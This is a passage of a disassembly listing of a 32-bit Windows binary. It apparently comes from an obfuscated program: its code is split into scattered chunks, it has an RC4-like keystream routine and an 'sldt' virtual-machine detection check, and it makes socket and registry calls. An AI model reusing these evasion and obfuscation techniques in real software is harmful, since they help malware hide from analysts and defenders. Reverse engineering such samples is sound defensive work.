mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B1584
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AD0A4: ; CODE XREF: sub_9B0930+3540�j
push off_9B94DB
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx+34h], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop eax
mov ecx, [eax+34h]
test ecx, ecx
jz loc_9B23EF
jmp loc_9B3A18
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2C70
loc_9AD0D8: ; CODE XREF: sub_9B2C70+9�j
mov edx, dword_9BCB74
mov eax, [edx+10h]
call dword ptr [eax+4Ch]
cmp eax, 2733h
jz loc_9B01DE
jmp off_9B9010
; END OF FUNCTION CHUNK FOR sub_9B2C70
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9AD0F8: ; CODE XREF: sub_9AC32C+4D�j
; DATA XREF: .text:off_9B87AC�o
or edi, 24h
loc_9AD0FB: ; CODE XREF: sub_9AC32C+47�j
; sub_9AC32C+2C69�j
test edi, edi
mov eax, edi
jnz loc_9AC5FB
jmp loc_9AC5F8
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9AD10C: ; CODE XREF: sub_9B037C+5B28�j
test al, 40h
jz loc_9B5724
jmp loc_9B2B08
; END OF FUNCTION CHUNK FOR sub_9B037C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AD11C proc near ; CODE XREF: sub_9B63D8-AE1E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 009AB910 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AD1F8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AD268 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AFA4C SIZE 0000003D BYTES
; FUNCTION CHUNK AT 009B0B34 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B33D0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 009B36C0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 009B5538 SIZE 0000005B BYTES
sub esp, 18h
mov eax, dword_9B8788
xor eax, esp
lea edx, [esp+18h+var_18]
push edx
mov [esp+1Ch+var_4], eax
mov eax, dword_9BCB74
push 8004667Eh
mov [esp+20h+var_18], 1
push dword ptr [eax+10h]
pop ecx
push esi
call dword ptr [ecx+54h]
or eax, eax
jz loc_9B5538
jmp loc_9AD268
sub_9AD11C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9AD158: ; CODE XREF: sub_9B3408-AC9�j
push esi
lea eax, [ebp-120h]
call sub_9B18F8
push dword ptr [esi+44h]
pop ecx
mov eax, [esi]
push eax
lea eax, [ebp-120h]
mov edx, ecx
call sub_9AB95C
add esp, 4
mov ecx, esi
call sub_9B3150
or eax, eax
jz loc_9AB749
jmp off_9BA164
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9AD190: ; CODE XREF: sub_9B2830-707E�j
; sub_9B2830-1AD�j ...
sub esi, esi
mov [ebp-1Ch], esi
loc_9AD195: ; CODE XREF: sub_9B2830+231E�j
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9B4901
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AD1A4 proc near ; CODE XREF: sub_9B4480-61F6�j
; sub_9B4480+28B�j
; FUNCTION CHUNK AT 009AEA28 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B25E5 SIZE 00000031 BYTES
push ebx
mov edx, edi
lea eax, [ebp-328h]
mov ecx, edi
call sub_9AB95C
add esp, 4
or esi, esi
jnz loc_9AEA3A
jmp loc_9AEA28
sub_9AD1A4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AD1C4: ; CODE XREF: sub_9B1A08+47E9�j
push [ebp+var_41F0]
pop eax
and eax, eax
jnz loc_9B06BF
jmp off_9BA5FC
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AD1DC: ; CODE XREF: sub_9B3864-6C22�j
mov edx, [ebp+var_2028]
test edx, edx
mov edx, [ebp+var_2020]
jnz loc_9AE83C
jmp loc_9AF808
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9AD1F8: ; CODE XREF: sub_9AD11C+2967�j
; DATA XREF: .text:off_9B96D8�o
mov eax, edi
loc_9AD1FA: ; CODE XREF: sub_9AD11C+2961�j
mov ecx, [esp+1Ch+var_4]
pop edi
xor ecx, esp
call sub_9AAAC1
add esp, 18h
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AD20C: ; CODE XREF: sub_9B1D80-4ACF�j
; DATA XREF: .text:off_9BB050�o
mov edx, [edi+4]
push edx
pop eax
call sub_9B327C
test eax, eax
jnz loc_9B1D5B
jmp loc_9AF8D0
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9AD224: ; CODE XREF: sub_9B04A8-2F6D�j
; DATA XREF: .text:off_9B9441�o
mov edx, [ebp-4050h]
push edx
push edi
lea eax, [ebp-201Ch]
push eax
push 0Ah
pop eax
call sub_9B3F28
mov ebx, eax
mov [ebp-404Ch], ebx
test bl, 4
jnz loc_9B01B8
jmp loc_9B1CDC
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AD254: ; CODE XREF: sub_9B0930+2365�j
mov edx, [eax+14h]
cmp dword ptr [edx], 0
jz loc_9B23EF
jmp loc_9B633C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9AD268: ; CODE XREF: sub_9AD11C+34�j
push 1
pop eax
push [esp+18h+var_4]
pop ecx
xor ecx, esp
call sub_9AAAC1
add esp, 18h
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9AD280: ; CODE XREF: sub_9AC32C+8D18�j
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
lea eax, [esp+324h+var_30C]
push eax
push esi
call dword ptr [edx+58h]
or eax, eax
jz loc_9B4127
jmp off_9B96F0
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AD2A0: ; CODE XREF: sub_9B1D80-2046�j
push dword ptr [ebp-2044h]
pop ecx
test byte ptr [ecx+8], 2
jnz loc_9B1D5B
jmp off_9BB050
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AD2B8 proc near ; CODE XREF: sub_9B2118-1B44�p
arg_0 = dword ptr 4
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9B94D7
call dword ptr [ecx+68h]
push [esp+arg_0]
pop eax
sub edx, edx
mov dword_9BF380, edx
mov dword_9BF384, edx
mov dword_9BF388, edx
mov dword_9BF38C, edx
mov dword_9BF390, edx
mov dword_9BF394, edx
mov word_9BF398, dx
mov dword_9BF38C+2, eax
retn 4
sub_9AD2B8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AD304: ; CODE XREF: sub_9AB1A0+5EA1�j
; sub_9AB1A0+70B9�j ...
sub edi, edi
mov [ebp-1Ch], edi
loc_9AD309: ; CODE XREF: sub_9AB1A0+70B3�j
and edi, edi
jz loc_9B5F54
jmp off_9B8C85
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AD318: ; CODE XREF: sub_9B4FD0-4173�j
xor ecx, ecx
call sub_9B4610
xor eax, eax
loc_9AD321: ; CODE XREF: sub_9B4FD0-243�j
mov [ebp-22Ch], eax
cmp eax, 40h
jnb loc_9B5710
jmp off_9B9970
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9AD33B: ; CODE XREF: sub_9B3A74-3693�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push off_9BADC8
call dword ptr [eax+1Ch]
mov eax, [ebp-128h]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_9B3A74
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AD37C: ; CODE XREF: sub_9ADAC4+223�j
cmp ebx, 0FFFFFFFFh
jz loc_9B0BD3
jmp off_9BAED5
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
shr edx, 5
push edx
pop ecx
and ecx, 1Fh
mov eax, 1
shl eax, cl
shr edx, 5
and eax, dword_9BA4E8[edx*4]
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEDD0
loc_9AD3A8: ; CODE XREF: sub_9AEDD0+3152�j
mov edx, dword_9BCB74
mov eax, [edx]
push off_9BAD92
mov esi, 1
call dword ptr [eax+1Ch]
push esi
pop eax
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_9AEDD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AD3C4: ; CODE XREF: sub_9B4950-8899�j
; sub_9B4950-129C�j
call sub_9B46CC
mov [ebp-3Ch], eax
cmp eax, [ebp-20h]
jz loc_9B2944
jmp off_9B8EDE
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AD3DC: ; CODE XREF: sub_9B3864+1A63�j
; DATA XREF: .text:off_9BA611�o
sub ecx, ecx
cmp ebx, ecx
jz loc_9AE2AC
jmp loc_9B01F8
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AD3EC proc near ; CODE XREF: sub_9B6078-56BD�p
; sub_9B3E78-307D�p
; FUNCTION CHUNK AT 009AF494 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B122C SIZE 00000049 BYTES
; FUNCTION CHUNK AT 009B18BC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B4093 SIZE 0000001E BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BB097
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
call sub_9AEBB8
xor eax, 3D8E2ED2h
add eax, [ebp+8]
sub edx, edx
mov [ebp-1Ch], eax
loc_9AD42D: ; CODE XREF: sub_9AD3EC+44DA�j
mov [ebp-20h], edx
cmp edx, 80h
jnb loc_9B122C
jmp loc_9AF494
sub_9AD3EC endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9AD444: ; CODE XREF: sub_9B2F1C-54B2�j
; DATA XREF: .text:off_9BA02D�o
mov edx, [ebp+0Ch]
mov dword ptr [edx], 0
jmp loc_9B528F
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AD454: ; CODE XREF: sub_9ADAC4+BFF�j
; DATA XREF: .text:off_9BADA4�o
lea esi, [ebp+edi*4-84h]
mov eax, [esi]
test eax, eax
jz loc_9AAFA3
jmp off_9B896F
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AD46C: ; CODE XREF: sub_9B1A08-68A1�j
mov ecx, edi
lea esi, [ebp+var_201C]
push eax
pop edi
push ecx
pop edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
loc_9AD484: ; CODE XREF: sub_9B1A08-68A7�j
; sub_9B1A08-30AA�j ...
mov eax, [ebp+var_41E0]
test eax, eax
jbe loc_9AF398
jmp off_9B97E1
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9AD498: ; CODE XREF: sub_9B562C-4E38�j
push dword_9BCB74
pop eax
mov ecx, [eax]
push edi
push 40h
call dword ptr [ecx+7Ch]
mov esi, eax
mov [ebp+var_138], esi
cmp esi, ebx
jz loc_9AECDF
jmp off_9BAC79
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
align 10h
loc_9AD4C0: ; CODE XREF: .text:009AB50E�j
sldt ax
or ax, ax
setnz al
movzx eax, al
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B6504
loc_9AD4D0: ; CODE XREF: sub_9B6504-5B7�j
; DATA XREF: .text:off_9B9781�o
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push 4E20h
call dword ptr [ecx+4]
jmp loc_9B1C93
; END OF FUNCTION CHUNK FOR sub_9B6504
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AD4EB: ; CODE XREF: sub_9ADAC4-21CE�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop eax
mov ecx, [eax]
push 0
call dword ptr [ecx+60h]
xor eax, eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9AD524: ; CODE XREF: sub_9B04A8+1A2B�j
; DATA XREF: .text:off_9BA911�o
mov dword ptr [ebp-4040h], 0
loc_9AD52E: ; CODE XREF: sub_9B04A8+183A�j
cmp dword ptr [ebp-4040h], 3
jge loc_9B18E8
jmp off_9B9441
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9AD544: ; CODE XREF: sub_9B43F4-5C49�j
push esi
pop edx
mov ecx, ebx
call sub_9AFB1C
test byte ptr [ebx+18h], 2
jz loc_9B3B10
jmp loc_9AF974
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AD55C: ; CODE XREF: sub_9B0930+479B�j
push off_9BA421
push dword ptr [eax]
pop ecx
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx]
pop ecx
mov [ecx+28h], eax
push dword_9BCB74
pop edx
mov eax, [edx]
mov ecx, [eax+28h]
or ecx, ecx
jz loc_9B23EF
jmp loc_9B23C0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AD590 proc near ; CODE XREF: sub_9B1F68-6881�p
; sub_9ADAC4+22D3�p ...
arg_0 = dword ptr 4
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
mov eax, [esp+arg_0]
push edx
mov edx, [eax+4]
push edx
call dword ptr [ecx+28h]
xor ecx, ecx
cmp eax, 102h
setnz cl
mov eax, ecx
retn 4
sub_9AD590 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9AD5B4: ; CODE XREF: sub_9ABD30+4A7F�j
add esi, eax
cmp esi, 2
jl loc_9B4713
jmp off_9B998E
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AD5C8: ; CODE XREF: sub_9B1A08-2058�j
dec esi
mov [ebp+var_41F0], esi
push [ebp+esi*4+var_43B4]
pop edi
mov [ebp+var_4214], edi
call sub_9B46CC
mov [ebp+var_4210], eax
push eax
mov eax, edi
lea esi, [ebp+var_4224]
call sub_9AC250
call sub_9B45AC
shl eax, 1
not eax
and eax, 2
or eax, 1
sub edx, edx
mov dx, [ebp+eax*4+var_4224]
push edx
push edi
pop edx
sub eax, eax
lea esi, [ebp+var_402C]
call sub_9B1334
mov esi, [ebp+var_41EC]
test esi, esi
jnz loc_9B351C
jmp loc_9AC380
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AD634: ; CODE XREF: sub_9B63D8-4B53�j
push dword ptr [ebp-2148h]
pop eax
test eax, eax
jnz loc_9B0304
jmp off_9B8D10
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AD64C: ; CODE XREF: sub_9ADAC4+503D�j
or esi, 0FFFFFFFFh
mov [ebp-48h], esi
sub eax, eax
loc_9AD654: ; CODE XREF: sub_9ADAC4+1F31�j
mov [ebp-40h], eax
cmp eax, 0Ah
jge loc_9ABE35
jmp off_9B9559
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2C70
loc_9AD668: ; CODE XREF: sub_9B2C70+F�j
; DATA XREF: .text:off_9B8D42�o
push eax
push ebx
call sub_9B0E7C
push dword ptr [ebp-38h]
pop eax
push eax
push ebx
push off_9BA0BD
call sub_9ABF08
mov [edi+ebp-248h], eax
test eax, eax
jnz loc_9B01DE
jmp loc_9AE9B4
; END OF FUNCTION CHUNK FOR sub_9B2C70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B27D8
loc_9AD694: ; CODE XREF: sub_9B27D8+1C13�j
; DATA XREF: .text:off_9B8D69�o
call dword ptr [eax+18h]
push off_9B97DD
pop eax
call sub_9AD7A4
push dword_9BCB74
pop ecx
mov edx, [ecx]
push off_9B8ED2
push eax
pop esi
call dword ptr [edx+1Ch]
push esi
pop eax
xor edx, edx
push 0Ah
pop ecx
div ecx
or edx, edx
jnz loc_9AB32B
jmp off_9B9868
; END OF FUNCTION CHUNK FOR sub_9B27D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9AD6D0: ; CODE XREF: sub_9B3EFC-5FA1�j
; DATA XREF: .text:off_9BAB6E�o
cmp eax, 0FFFFFDh
jz short loc_9AD6E0
jmp off_9B9449
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9AD6E0: ; CODE XREF: sub_9B3EFC-8BF2�j
; sub_9B3EFC-6827�j ...
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AD6E8: ; CODE XREF: sub_9B63D8-93ED�j
; DATA XREF: .text:off_9B8D65�o
mov eax, ebx
call sub_9B327C
and eax, eax
jnz loc_9AF944
jmp loc_9B5A74
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF5E4
loc_9AD704: ; CODE XREF: sub_9AF5E4+B�j
push dword_9BA79C
pop edx
mov [edi], edx
mov eax, dword_9BA7A0
mov [edi+4], eax
mov ecx, dword_9BA7A4
mov [edi+8], ecx
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
push off_9B8ED2
call dword ptr [eax+18h]
mov eax, off_9B97DD
call sub_9AD7A4
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push off_9B8ED2
push eax
pop esi
call dword ptr [edx+1Ch]
mov eax, esi
sub edx, edx
push 3
pop ecx
div ecx
mov edx, off_9B90BC[edx*4]
mov eax, edx
loc_9AD761: ; CODE XREF: sub_9AF5E4:loc_9B09DC�j
mov cl, [edx]
inc edx
or cl, cl
jmp loc_9B09DC
; END OF FUNCTION CHUNK FOR sub_9AF5E4
; ---------------------------------------------------------------------------
align 4
push dword_9BCB98
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9AD774: ; CODE XREF: sub_9AC250+5137�j
; DATA XREF: .text:off_9B9264�o
push dword ptr [esi+4]
pop ecx
cmp ecx, edi
jz loc_9B536C
jmp loc_9AF174
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AD788: ; CODE XREF: sub_9B1A08+4003�j
xor esi, esi
loc_9AD78A: ; CODE XREF: sub_9B1A08+3FA4�j
mov [ebp+var_41E8], esi
cmp esi, [ebp+var_41E0]
jnb loc_9B47A0
jmp off_9B91AA
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AD7A4 proc near ; CODE XREF: sub_9B27D8-7497�p
; sub_9AB3B0+2B�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
; FUNCTION CHUNK AT 009B2E90 SIZE 00000069 BYTES
push ecx
push ebx
push esi
push edi
mov cl, [eax]
inc cl
mov [eax], cl
mov bl, [eax+1]
movzx ecx, cl
mov dl, [eax+ecx+2]
add bl, dl
mov [eax+1], bl
mov dl, bl
lea ecx, [eax+ecx+2]
mov bl, [ecx]
movzx edx, dl
mov dl, [eax+edx+2]
mov [ecx], dl
movzx ecx, byte ptr [eax+1]
mov [eax+ecx+2], bl
mov cl, [eax]
movzx edx, byte ptr [eax+1]
movzx esi, cl
mov dl, [eax+edx+2]
add dl, [eax+esi+2]
inc cl
movzx edx, dl
mov dl, [eax+edx+2]
mov [eax], cl
movzx ecx, cl
mov bl, [eax+ecx+2]
add [eax+1], bl
mov bl, [eax+1]
lea ecx, [eax+ecx+2]
mov [esp+10h+var_4], bl
mov bl, [ecx]
movzx esi, [esp+10h+var_4]
mov [esp+10h+var_3], bl
mov bl, [eax+esi+2]
mov [ecx], bl
movzx ecx, byte ptr [eax+1]
mov bl, [esp+10h+var_3]
mov [eax+ecx+2], bl
mov cl, [eax]
movzx esi, byte ptr [eax+1]
movzx edi, cl
mov bl, [eax+esi+2]
add bl, [eax+edi+2]
inc cl
movzx esi, bl
mov bl, [eax+esi+2]
mov [eax], cl
movzx ecx, cl
mov [esp+10h+var_2], bl
mov bl, [eax+ecx+2]
add [eax+1], bl
mov bl, [eax+1]
lea ecx, [eax+ecx+2]
mov [esp+10h+var_3], bl
mov bl, [ecx]
movzx esi, [esp+10h+var_3]
mov [esp+10h+var_4], bl
mov bl, [eax+esi+2]
mov [ecx], bl
movzx ecx, byte ptr [eax+1]
mov bl, [esp+10h+var_4]
mov [eax+ecx+2], bl
mov cl, [eax]
movzx edi, cl
movzx esi, byte ptr [eax+1]
mov bl, [eax+esi+2]
add bl, [eax+edi+2]
inc cl
movzx esi, bl
mov bl, [eax+esi+2]
jmp off_9BAC17
sub_9AD7A4 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AD898: ; CODE XREF: sub_9B1A08-426C�j
; DATA XREF: .text:off_9B91AA�o
lea edi, [esi+esi*4]
shl edi, 3
lea ebx, [edi+ebp-41BCh]
cmp dword ptr [ebx], 0
jz loc_9B59AB
jmp loc_9AEEE8
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9AD8BC: ; CODE XREF: sub_9B3984+78�j
push [ebp+var_4058]
pop eax
push eax
xor edx, edx
call sub_9B5CDC
test eax, eax
jnz loc_9AB89C
jmp loc_9AE544
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B5480
loc_9AD8D8: ; CODE XREF: sub_9B5480-6AD5�j
; DATA XREF: .text:off_9BAC29�o
call sub_9AC448
loc_9AD8DD: ; CODE XREF: sub_9B5480-6ADB�j
push dword ptr [esi]
pop eax
push dword ptr [eax+48h]
pop eax
test eax, eax
jz loc_9AB85D
jmp off_9B8900
; END OF FUNCTION CHUNK FOR sub_9B5480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF5E4
loc_9AD8F4: ; CODE XREF: sub_9AF5E4+1EE1�j
push edx
pop ecx
shr ecx, 2
mov esi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edx, dword_9BCB74
mov eax, [edx]
push off_9B8ED2
call dword ptr [eax+18h]
push off_9B97DD
pop eax
call sub_9AD7A4
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push off_9B8ED2
mov esi, eax
call dword ptr [edx+1Ch]
sub edx, edx
push esi
pop eax
push 3
pop ecx
div ecx
mov edx, off_9BA42C[edx*4]
push edx
pop eax
loc_9AD948: ; CODE XREF: sub_9AF5E4-1C97�j
mov cl, [edx]
inc edx
test cl, cl
jnz short loc_9AD948
jmp off_9B8945
; END OF FUNCTION CHUNK FOR sub_9AF5E4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AD958: ; CODE XREF: sub_9B1D80-5919�j
; DATA XREF: .text:off_9BA4E1�o
cmp esi, 11h
jnz loc_9AE945
jmp loc_9B610C
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AD968: ; CODE XREF: sub_9B0930+2469�j
; DATA XREF: .text:off_9B97D9�o
mov edx, [eax+8]
cmp dword ptr [edx], 0
jz loc_9B23EF
jmp off_9B88D0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9AD97C proc near ; CODE XREF: sub_9AFF64+4F5�p
; sub_9AFF64+51F�p
; FUNCTION CHUNK AT 009AC184 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009AF884 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009B0218 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B1634 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B454B SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009B51E4 SIZE 00000008 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B8CAD
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
xor esi, esi
mov [ebp-18h], esp
mov [ebp-1Ch], esi
mov [ebp-20h], esi
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9BADC8
call dword ptr [ecx+18h]
mov [ebp-4], esi
push dword_9BCB74
pop edx
mov eax, [edx+0Ch]
lea ecx, [ebp-1Ch]
push ecx
push 20006h
push esi
push dword ptr [ebp+0Ch]
pop edx
push edx
mov ecx, [ebp+8]
jmp loc_9B0218
sub_9AD97C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AD9E4: ; CODE XREF: sub_9B0930-5B10�j
; DATA XREF: .text:off_9B99FA�o
push dword ptr [eax+0Ch]
pop edx
and edx, edx
jz loc_9B23EF
jmp loc_9AE254
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AD9F8: ; CODE XREF: sub_9B3864-86D4�j
; sub_9B3864-4425�j
; DATA XREF: ...
cmp edi, 6
jnz loc_9B36C8
jmp off_9B96C8
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
